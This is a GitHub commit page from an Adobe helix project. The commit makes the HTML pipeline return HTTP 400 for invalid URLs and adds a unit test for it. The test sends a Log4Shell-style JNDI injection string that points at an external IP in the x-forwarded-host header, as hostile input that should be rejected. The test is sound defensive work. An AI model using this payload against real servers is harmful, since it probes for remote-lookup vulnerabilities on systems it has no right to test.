fix: handling invalid input url with 400 (#16)

fixes #15
adobe · Mar 11, 2022 · 4491691 · 4491691
1 parent 9fd93d9
commit 4491691
Show file tree

Hide file tree

Showing 2 changed files with 31 additions and 0 deletions.
diff --git a/src/html-pipe.js b/src/html-pipe.js
@@ -110,6 +110,13 @@ export async function htmlPipe(state, req) {
     }
     log.error(`error running pipeline: ${res.status} ${res.error}`, e);
     res.headers.set('x-error', cleanupHeaderValue(res.error));
+
+    // turn any URL errors into a 400, since they are user input
+    // see https://github.com/adobe/helix-pipeline-service/issues/346
+    if (e.code === 'ERR_INVALID_URL') {
+      res.status = 400;
+      res.headers.set('x-error', cleanupHeaderValue(`invalid url: ${e.input}`));
+    }
   }
 
   return res;

diff --git a/test/html-pipe.test.js b/test/html-pipe.test.js
@@ -26,6 +26,30 @@ describe('Index Tests', () => {
     assert.strictEqual(resp.headers.get('x-error'), 'invalid path');
   });
 
+  it('responds with 400 for invalid xfh', async () => {
+    const resp = await htmlPipe(
+      new PipelineState({
+        log: console,
+        s3Loader: new FileS3Loader(),
+        owner: 'adobe',
+        repo: 'helix-pages',
+        ref: 'super-test',
+        partition: 'live',
+        path: '/',
+        contentBusId: 'foo-id',
+      }),
+      new PipelineRequest(new URL('https://www.hlx.live/'), {
+        headers: {
+          // eslint-disable-next-line no-template-curly-in-string
+          'x-forwarded-host': '${jndi:dns://3.238.15.214/ORTbVlfjTl}',
+        },
+      }),
+    );
+    assert.strictEqual(resp.status, 400);
+    // eslint-disable-next-line no-template-curly-in-string
+    assert.strictEqual(resp.headers.get('x-error'), 'invalid url: https://${jndi:dns://3.238.15.214/ORTbVlfjTl}/');
+  });
+
   it('responds with 500 for pipeline errors', async () => {
     /** @type htmlPipe */
     const { htmlPipe: mockPipe } = await esmock('../src/html-pipe.js', {